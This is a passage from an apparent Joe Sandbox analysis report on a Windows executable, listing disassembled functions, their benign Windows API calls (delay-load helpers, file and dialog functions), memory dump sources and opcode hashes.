                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 55df61b9515e6b4e78fe7a63e289f9ec680f3e9ee35788914c03dcb256c9b3d5
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 55df61b9515e6b4e78fe7a63e289f9ec680f3e9ee35788914c03dcb256c9b3d5
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F549 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d7084ead02764c2abd495823a4bef8fdb26de1f6a6c2a790f44e8e255984d147
                                                                                              • Instruction ID: a24cc84b42b2ba283859e60e2ad8f11ead88c309bce5db712a1fde1b2c3280bb
                                                                                              • Opcode Fuzzy Hash: d7084ead02764c2abd495823a4bef8fdb26de1f6a6c2a790f44e8e255984d147
                                                                                              • Instruction Fuzzy Hash: 87A011E22A80203E320A2A223E23C3B022CC0C0B20330803AF00088080AA802C800030
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F5A0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0118e9a7469e45cd79745617c6f592fead8441addc708da2c1af03790b7a47fe
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 0118e9a7469e45cd79745617c6f592fead8441addc708da2c1af03790b7a47fe
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F596 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3ec4f82acc302384325de47bb38dff2db20d52561c55a63a876d79e41fc7dee2
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 3ec4f82acc302384325de47bb38dff2db20d52561c55a63a876d79e41fc7dee2
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F58C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7f7adcf75fd6aaa545158a89d0b338f56b9338d762db31c0d036f5e02bec696d
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 7f7adcf75fd6aaa545158a89d0b338f56b9338d762db31c0d036f5e02bec696d
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5fdcd8bed10f221f4ac3038d4d9b4b0753e907673d578ec6976a5cce54be956d
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 5fdcd8bed10f221f4ac3038d4d9b4b0753e907673d578ec6976a5cce54be956d
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 264e9bdf7560bc1007e896c7aafc6d2c1c26e4d05c54777921e665c0f9bb71bf
                                                                                              • Instruction ID: 3f33f9db15b3d859e84e3f9e6312ce4bab6348728fdd1763954b71bfc692f809
                                                                                              • Opcode Fuzzy Hash: 264e9bdf7560bc1007e896c7aafc6d2c1c26e4d05c54777921e665c0f9bb71bf
                                                                                              • Instruction Fuzzy Hash: 4CA002F66B9221BE320B66657EA7D7B127CD8D0F79330893FF401DC481A9806DC51071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6E1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 59695e73f3f32f15946caa6fab1e43036f05002a65baca9bf79e53e84cc0fdf3
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 59695e73f3f32f15946caa6fab1e43036f05002a65baca9bf79e53e84cc0fdf3
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F6EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 491448e5504fce1c972f5d7e4dfbc2a4bec804bf3dd75b9b2e85507790cb3f17
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 491448e5504fce1c972f5d7e4dfbc2a4bec804bf3dd75b9b2e85507790cb3f17
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F72E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4c139685af4dde5bfd22e27ee6cc4ee61f38835ff4dbb2d538a87aaabbf06dd6
                                                                                              • Instruction ID: 12c72249b292c8b2345f133feae8e126f7b5644a6aa0d421f0c0df8ed0de5eed
                                                                                              • Opcode Fuzzy Hash: 4c139685af4dde5bfd22e27ee6cc4ee61f38835ff4dbb2d538a87aaabbf06dd6
                                                                                              • Instruction Fuzzy Hash: A6A001A66A9222BE320A66657E67D7A126CC8D4BA5330893EF4028C481A9806D851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F71A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f4bd62c23b1b45df3655da61edea574ffbf3dce782436fc8e4264b62296dd045
                                                                                              • Instruction ID: 12c72249b292c8b2345f133feae8e126f7b5644a6aa0d421f0c0df8ed0de5eed
                                                                                              • Opcode Fuzzy Hash: f4bd62c23b1b45df3655da61edea574ffbf3dce782436fc8e4264b62296dd045
                                                                                              • Instruction Fuzzy Hash: A6A001A66A9222BE320A66657E67D7A126CC8D4BA5330893EF4028C481A9806D851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B199 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,0031A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,0031922F,-00008BE0), ref: 0031B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 91f97065e69a3aa1093bdb40e1fd9f9183737abbdfa7335c92d2543b0bccf542
                                                                                              • Instruction ID: 27c4e95a7be124335864a8e2bf087cb965f445aa8d43280f7fe4ee54bc558b55
                                                                                              • Opcode Fuzzy Hash: 91f97065e69a3aa1093bdb40e1fd9f9183737abbdfa7335c92d2543b0bccf542
                                                                                              • Instruction Fuzzy Hash: E8A01234040009468D411B30D90410C7710E7117C070001A45006CE061CB2244178600
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BC19 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0032BFF6,00361890,00000000,00362892,00000006), ref: 0032BC1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: 254c77f9ba2a7f740dd6bd6c261c25fa8233f9fcbb42d9a7ccde67f39b774ec9
                                                                                              • Instruction ID: ccee7a7de138a4e1f76ffd588a625abe7c2bf87736a6a6c9294de36644aa48ce
                                                                                              • Opcode Fuzzy Hash: 254c77f9ba2a7f740dd6bd6c261c25fa8233f9fcbb42d9a7ccde67f39b774ec9
                                                                                              • Instruction Fuzzy Hash: 83A011322002008BA2020B328F0AA0EBAAAAFA2B00F00C038A00088030EB3088B0AA00
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0032D420 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0032D4B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 0032D4C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 0032D4E0
                                                                                              • SetFocus.USER32(00000000), ref: 0032D4E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0032D521
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0032D558
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0032D56E
                                                                                                • Part of subcall function 0032BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC3F
                                                                                                • Part of subcall function 0032BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0032BC50
                                                                                                • Part of subcall function 0032BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0032BC5E
                                                                                                • Part of subcall function 0032BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC6C
                                                                                                • Part of subcall function 0032BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0032BC87
                                                                                                • Part of subcall function 0032BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0032BCAE
                                                                                                • Part of subcall function 0032BC2B: _swprintf.LIBCMT ref: 0032BCD4
                                                                                              • _swprintf.LIBCMT ref: 0032D5B7
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0032D5CA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0032D5D1
                                                                                              • _swprintf.LIBCMT ref: 0032D620
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0032D633
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0032D650
                                                                                              • _swprintf.LIBCMT ref: 0032D683
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0032D696
                                                                                              • _swprintf.LIBCMT ref: 0032D6E0
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0032D6F3
                                                                                                • Part of subcall function 0032C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0032C0B9
                                                                                                • Part of subcall function 0032C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,0035072C,?,?), ref: 0032C108
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
